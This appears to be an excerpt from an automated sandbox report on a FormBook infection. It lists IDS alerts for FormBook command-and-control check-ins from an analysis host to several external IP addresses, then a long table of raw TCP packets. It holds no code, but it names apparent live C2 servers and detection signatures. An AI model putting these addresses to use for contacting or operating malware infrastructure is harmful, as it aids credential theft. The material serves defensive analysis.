                                                                                                                                                                                                              2024-10-08T15:34:25.192247+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9607153.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:28.651115+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.9607283.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:28.651115+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.9607283.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:36.000173+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960775203.175.9.12880TCP
                                                                                                                                                                                                              2024-10-08T15:34:38.444808+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960788203.175.9.12880TCP
                                                                                                                                                                                                              2024-10-08T15:34:41.093787+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960807203.175.9.12880TCP
                                                                                                                                                                                                              2024-10-08T15:34:43.504908+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.960821203.175.9.12880TCP
                                                                                                                                                                                                              2024-10-08T15:34:43.504908+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.960821203.175.9.12880TCP
                                                                                                                                                                                                              2024-10-08T15:34:49.003817+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9608323.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:51.548045+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9608333.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:54.114725+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9608343.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:56.674011+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.9608353.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:56.674011+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.9608353.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:35:07.426657+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960836199.192.19.1980TCP
                                                                                                                                                                                                              2024-10-08T15:35:10.238944+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960837199.192.19.1980TCP
                                                                                                                                                                                                              2024-10-08T15:35:12.826861+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960838199.192.19.1980TCP
                                                                                                                                                                                                              2024-10-08T15:35:15.289129+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.960839199.192.19.1980TCP
                                                                                                                                                                                                              2024-10-08T15:35:15.289129+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.960839199.192.19.1980TCP
                                                                                                                                                                                                              2024-10-08T15:35:21.277375+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960840208.91.197.2780TCP
                                                                                                                                                                                                              2024-10-08T15:35:23.849037+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960841208.91.197.2780TCP
                                                                                                                                                                                                              2024-10-08T15:35:26.372438+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960842208.91.197.2780TCP
                                                                                                                                                                                                              2024-10-08T15:35:29.515917+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.960843208.91.197.2780TCP
                                                                                                                                                                                                              2024-10-08T15:35:29.515917+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.960843208.91.197.2780TCP
                                                                                                                                                                                                              2024-10-08T15:35:36.363602+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960844156.242.132.8280TCP
                                                                                                                                                                                                              2024-10-08T15:35:39.453234+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960845156.242.132.8280TCP
                                                                                                                                                                                                              2024-10-08T15:35:42.000108+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960846156.242.132.8280TCP
                                                                                                                                                                                                              2024-10-08T15:36:04.387734+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.960847156.242.132.8280TCP
                                                                                                                                                                                                              2024-10-08T15:36:04.387734+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.960847156.242.132.8280TCP
                                                                                                                                                                                                              2024-10-08T15:36:18.221807+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.96084884.32.84.3280TCP
                                                                                                                                                                                                              2024-10-08T15:36:20.739145+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.96084984.32.84.3280TCP
                                                                                                                                                                                                              2024-10-08T15:36:23.290927+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.96085084.32.84.3280TCP
                                                                                                                                                                                                              2024-10-08T15:36:25.860953+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.96085184.32.84.3280TCP
                                                                                                                                                                                                              2024-10-08T15:36:25.860953+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.96085184.32.84.3280TCP
                                                                                                                                                                                                              2024-10-08T15:36:31.833598+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9608523.91.127.11680TCP
                                                                                                                                                                                                              2024-10-08T15:36:34.378358+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9608533.91.127.11680TCP
                                                                                                                                                                                                              2024-10-08T15:36:36.958949+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9608543.91.127.11680TCP
                                                                                                                                                                                                              2024-10-08T15:36:39.447772+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.9608553.91.127.11680TCP
                                                                                                                                                                                                              2024-10-08T15:36:39.447772+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.9608553.91.127.11680TCP
                                                                                                                                                                                                              2024-10-08T15:36:45.350125+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960856195.161.68.880TCP
                                                                                                                                                                                                              2024-10-08T15:36:47.872321+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960857195.161.68.880TCP
                                                                                                                                                                                                              2024-10-08T15:36:50.434708+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960858195.161.68.880TCP
                                                                                                                                                                                                              2024-10-08T15:36:52.998866+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.960859195.161.68.880TCP
                                                                                                                                                                                                              2024-10-08T15:36:52.998866+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.960859195.161.68.880TCP
                                                                                                                                                                                                              2024-10-08T15:36:58.822777+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960860194.58.112.17480TCP
                                                                                                                                                                                                              2024-10-08T15:37:01.358985+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960861194.58.112.17480TCP
                                                                                                                                                                                                              2024-10-08T15:37:03.925498+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960862194.58.112.17480TCP
                                                                                                                                                                                                              2024-10-08T15:37:06.473050+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.960863194.58.112.17480TCP
                                                                                                                                                                                                              2024-10-08T15:37:06.473050+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.960863194.58.112.17480TCP
                                                                                                                                                                                                              2024-10-08T15:37:12.998557+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.96086415.197.204.5680TCP
                                                                                                                                                                                                              2024-10-08T15:37:15.516621+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.96086515.197.204.5680TCP
                                                                                                                                                                                                              2024-10-08T15:37:18.064555+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.96086615.197.204.5680TCP
                                                                                                                                                                                                              2024-10-08T15:37:20.988426+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.96086715.197.204.5680TCP
                                                                                                                                                                                                              2024-10-08T15:37:20.988426+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.96086715.197.204.5680TCP
                                                                                                                                                                                                              2024-10-08T15:37:27.559782+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960868154.23.184.24080TCP
                                                                                                                                                                                                              2024-10-08T15:37:30.080815+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960869154.23.184.24080TCP
                                                                                                                                                                                                              2024-10-08T15:37:32.875337+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.960870154.23.184.24080TCP
                                                                                                                                                                                                              2024-10-08T15:37:35.160910+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.960871154.23.184.24080TCP
                                                                                                                                                                                                              2024-10-08T15:37:35.160910+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.960871154.23.184.24080TCP

                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.216275930 CEST6054980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.222327948 CEST80605493.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.222448111 CEST6054980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.230236053 CEST6054980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.235281944 CEST80605493.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:37.817831039 CEST80605493.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:37.817910910 CEST80605493.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:37.817923069 CEST80605493.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:37.818114042 CEST6054980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:33:37.821636915 CEST6054980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:33:37.827649117 CEST80605493.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:52.897890091 CEST6055180192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:52.903253078 CEST806055174.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:52.903402090 CEST6055180192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:52.914947987 CEST6055180192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:52.920305967 CEST806055174.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:53.420114040 CEST806055174.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:53.420178890 CEST806055174.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:53.420265913 CEST6055180192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:54.421956062 CEST6055180192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:55.440839052 CEST6055280192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:55.446353912 CEST806055274.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:55.446523905 CEST6055280192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:55.464616060 CEST6055280192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:55.469789982 CEST806055274.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:55.974159956 CEST806055274.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:55.974373102 CEST806055274.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:55.974520922 CEST6055280192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:56.968823910 CEST6055280192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:57.987437963 CEST6055980192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:57.993284941 CEST806055974.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:57.993416071 CEST6055980192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:58.003472090 CEST6055980192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:58.009254932 CEST806055974.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:58.009927034 CEST806055974.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:58.518306971 CEST806055974.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:58.518554926 CEST806055974.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:58.518621922 CEST6055980192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:33:59.515562057 CEST6055980192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:34:00.534940004 CEST6057580192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:34:00.888519049 CEST806057574.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:00.890789032 CEST6057580192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:34:00.898246050 CEST6057580192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:34:00.903448105 CEST806057574.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:01.419403076 CEST806057574.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:01.420407057 CEST806057574.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:01.420541048 CEST6057580192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:34:01.422384024 CEST6057580192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:34:01.427606106 CEST806057574.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.459428072 CEST6061180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.464278936 CEST80606113.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.464428902 CEST6061180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.474298000 CEST6061180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.479410887 CEST80606113.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:07.984460115 CEST6061180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:08.000591040 CEST80606113.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:08.000654936 CEST6061180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.003706932 CEST6062780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.010478020 CEST80606273.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.010601044 CEST6062780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.021058083 CEST6062780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.026278973 CEST80606273.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:10.398233891 CEST80606273.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:10.398319006 CEST6062780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:10.534012079 CEST6062780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:10.540570021 CEST80606273.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.550338030 CEST6064180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.555488110 CEST80606413.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.555603981 CEST6064180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.565047026 CEST6064180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.570103884 CEST80606413.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.570441008 CEST80606413.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:12.054574966 CEST80606413.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:12.054677963 CEST6064180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:13.079571009 CEST6064180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:13.084527969 CEST80606413.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.097464085 CEST6065780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.102715015 CEST80606573.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.102838039 CEST6065780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.109869957 CEST6065780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.114891052 CEST80606573.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.561187983 CEST80606573.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.561206102 CEST80606573.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.561340094 CEST6065780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.563975096 CEST6065780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.569063902 CEST80606573.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.605757952 CEST6067980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.611465931 CEST80606793.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.611609936 CEST6067980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.625890017 CEST6067980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.631180048 CEST80606793.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:21.140669107 CEST6067980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:21.146343946 CEST80606793.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:21.146471977 CEST6067980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.159960985 CEST6069880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.165713072 CEST80606983.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.165802956 CEST6069880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.176304102 CEST6069880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.181421041 CEST80606983.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:23.564466953 CEST80606983.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:23.564524889 CEST6069880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:23.687494040 CEST6069880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:23.692594051 CEST80606983.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.707370043 CEST6071580192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.712521076 CEST80607153.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.712611914 CEST6071580192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.727288008 CEST6071580192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.732328892 CEST80607153.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.732459068 CEST80607153.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:25.192147017 CEST80607153.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:25.192246914 CEST6071580192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:26.236241102 CEST6071580192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:26.241370916 CEST80607153.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.253767014 CEST6072880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.258780956 CEST80607283.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.258896112 CEST6072880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.265856981 CEST6072880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.270946980 CEST80607283.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.650372028 CEST80607283.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.650906086 CEST80607283.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.651114941 CEST6072880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.653213978 CEST6072880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.658725977 CEST80607283.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.473763943 CEST6077580192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.478828907 CEST8060775203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.478902102 CEST6077580192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.490788937 CEST6077580192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.496001005 CEST8060775203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:36.000173092 CEST6077580192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:36.008111954 CEST8060775203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:36.008182049 CEST6077580192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.022981882 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.029571056 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.030164003 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.040915012 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.046407938 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444736958 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444752932 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444762945 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444808006 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444848061 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444858074 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444864035 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444875002 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444890022 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.445036888 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.445055962 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.445092916 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.445257902 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.445301056 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.546895981 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:39.567007065 CEST6080780192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:39.572741985 CEST8060807203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:39.572896004 CEST6080780192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:39.583482981 CEST6080780192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:39.588329077 CEST8060807203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:39.588664055 CEST8060807203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:41.093786955 CEST6080780192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:41.099734068 CEST8060807203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:41.099836111 CEST6080780192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:42.112981081 CEST6082180192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:42.117849112 CEST8060821203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:42.117918968 CEST6082180192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:42.125914097 CEST6082180192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:42.131227970 CEST8060821203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:43.493650913 CEST8060821203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:43.504765987 CEST8060821203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:43.504908085 CEST6082180192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:43.507483006 CEST8060821203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:43.507602930 CEST6082180192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:43.508434057 CEST6082180192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:43.513505936 CEST8060821203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.535998106 CEST6083280192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.541851997 CEST80608323.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.541919947 CEST6083280192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.552954912 CEST6083280192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.557955980 CEST80608323.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:49.003735065 CEST80608323.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:49.003817081 CEST6083280192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:50.062616110 CEST6083280192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:50.068435907 CEST80608323.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:51.081362963 CEST6083380192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:51.086697102 CEST80608333.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:51.087054968 CEST6083380192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:51.098999977 CEST6083380192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:51.104417086 CEST80608333.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:51.547933102 CEST80608333.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:51.548044920 CEST6083380192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:52.609437943 CEST6083380192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:52.615778923 CEST80608333.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:53.628653049 CEST6083480192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:53.633785009 CEST80608343.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:53.634232998 CEST6083480192.168.2.93.33.130.190
